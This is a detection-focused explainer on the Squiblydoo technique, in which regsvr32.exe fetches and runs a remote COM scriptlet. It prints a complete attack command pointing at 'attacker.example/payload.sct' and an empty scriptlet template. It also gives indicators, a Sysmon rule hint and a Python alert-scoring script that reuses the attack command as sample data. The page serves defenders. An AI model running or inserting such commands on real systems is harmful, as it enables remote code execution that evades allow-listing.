Regsvr32 Scriptlet Execution (Squiblydoo)

Attackers abuse regsvr32.exe to fetch and run a remote COM scriptlet, executing code under a signed binary while bypassing application allow-listing.

regsvr32.exe is the signed Windows utility for registering and unregistering COM components (DLLs and ActiveX controls). Its legitimate job is to call a DLL's DllRegisterServer / DllUnregisterServer exports. Attackers abuse a lesser-known feature: when pointed at a COM scriptlet (.sct) file, regsvr32 will fetch it — even from a remote URL — and execute the script it contains. This technique is widely known as Squiblydoo.

Because regsvr32.exe is Microsoft-signed and commonly allow-listed, Squiblydoo lets an attacker run JScript/VBScript with no file written to disk (the scriptlet can be retrieved straight over HTTP/S into memory). Analysts encounter it in phishing chains where a macro or LNK launches regsvr32 against an attacker-controlled URL.

How it works

The canonical Squiblydoo command line points regsvr32 at a remote scriptlet and tells it to run silently:

```text
regsvr32.exe /s /n /u /i:http://attacker.example/payload.sct scrobj.dll
```

/s is silent, /n skips calling DllRegisterServer, /u /i: invokes DllInstall for unregistration with the supplied resource, and scrobj.dll (the Microsoft script COM object) parses the .sct and runs the embedded <script> block. The scriptlet typically bootstraps further code:

```xml
<?XML version="1.0"?>
<scriptlet>
  <registration progid="x" classid="{...}">
    <script language="JScript"><![CDATA[
      // launches downstream payload (e.g., spawns powershell)
    ]]></script>
  </registration>
</scriptlet>
```

The defining indicators are the scrobj.dll reference, the /i: switch pointing at a URL or unusual path, and the /u flag used together with a remote resource — a combination that never appears in legitimate COM registration.

Detection & analysis

Static analysis:

  • Any retrieved .sct/.wsc file is XML containing a <scriptlet>/<script> block — easy to triage. Extract the script body and look for obfuscated ActiveXObject, WScript.Shell, eval, base64 blobs, or downstream powershell/cmd invocations.
  • Write a regex or YARA rule for the command line: regsvr32 combined with /i:http, /i:ftp, scrobj.dll, or /u against a non-local path indicates Squiblydoo.

Dynamic analysis:

  • In a sandbox, observe regsvr32.exe opening an outbound network connection — legitimate registration of a local DLL never does this. Capture the URL and pull the scriptlet for analysis.
  • Watch the process tree: regsvr32 spawning powershell.exe, cmd.exe, mshta.exe, or rundll32.exe is a strong behavioural signal. Note the parent too — Office apps or script hosts launching regsvr32 is anomalous.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \regsvr32.exe AND the command line contains /i: followed by http/https/ftp/\\ (UNC) OR references scrobj.dll. Raise severity when correlated with Event ID 3 (network connection) from the same PID or a child process that is a script/command interpreter.
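The two detection steps above (matching the command-line indicators, then escalating on a network connection or an interpreter child) can be prototyped over process and network events before being turned into a SIEM rule. The following is an added example, not code from the original page: it implements both checks in Python over a handful of constructed Sysmon-style event records (plain dicts using Sysmon's field names, not real Sysmon XML). The sample events, PIDs and the `attacker.example` host are constructed for illustration.

```python
import re

# Command-line indicators from the page: /i: pointing at http/https/ftp or a
# UNC path, or any reference to scrobj.dll.
REMOTE_RESOURCE = re.compile(r'/i:\s*"?(?:https?://|ftp://|\\\\)', re.IGNORECASE)
SCROBJ_REF = re.compile(r"scrobj\.dll", re.IGNORECASE)

# Child images that raise severity: the page's list plus the two classic
# Windows script hosts (added here as an assumption).
INTERPRETERS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
                "wscript.exe", "cscript.exe"}

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://attacker.example/payload.sct scrobj.dll",
     "ParentProcessId": 3300,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 3, "ProcessId": 4120, "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationHostname": "attacker.example", "DestinationPort": 80},
    {"EventID": 1, "ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile", "ParentProcessId": 4120,
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
    # Legitimate local registration by an installer: must not alert.
    {"EventID": 1, "ProcessId": 5000, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx",
     "ParentProcessId": 900, "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]


def basename(image: str) -> str:
    """Case-folded file name of a Windows image path (runs on any host OS)."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_squiblydoo_cmdline(cmdline: str) -> bool:
    """True when a regsvr32 command line carries the Squiblydoo indicators."""
    return bool(REMOTE_RESOURCE.search(cmdline) or SCROBJ_REF.search(cmdline))


def score_regsvr32(events):
    """Return one alert per suspicious regsvr32 PID, escalated to 'high' when the
    same PID makes a network connection or spawns a script/command interpreter."""
    alerts = {}
    # Pass 1: regsvr32 process creations whose command line matches.
    for ev in events:
        if (ev["EventID"] == 1 and basename(ev["Image"]) == "regsvr32.exe"
                and is_squiblydoo_cmdline(ev["CommandLine"])):
            alerts[ev["ProcessId"]] = {
                "pid": ev["ProcessId"], "severity": "medium",
                "parent": basename(ev["ParentImage"]),
                "reasons": ["suspicious regsvr32 command line"],
            }
    # Pass 2: correlate network events and child processes against those PIDs.
    for ev in events:
        if ev["EventID"] == 3 and ev["ProcessId"] in alerts:
            alert = alerts[ev["ProcessId"]]
            alert["severity"] = "high"
            alert["reasons"].append(f"outbound connection to {ev['DestinationHostname']}")
        elif (ev["EventID"] == 1 and ev.get("ParentProcessId") in alerts
                and basename(ev["Image"]) in INTERPRETERS):
            alert = alerts[ev["ParentProcessId"]]
            alert["severity"] = "high"
            alert["reasons"].append(f"spawned {basename(ev['Image'])}")
    return [alerts[pid] for pid in sorted(alerts)]


if __name__ == "__main__":
    for alert in score_regsvr32(SAMPLE_EVENTS):
        print(alert)
```

The two-pass structure matters: the correlation pass only runs once every regsvr32 creation has been seen, so event ordering within the batch does not affect the result. In a live pipeline the same logic would be applied over a bounded time window keyed on PID, and the `parent` field gives the analyst the "Office app or script host launched regsvr32" context from the dynamic-analysis notes above.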
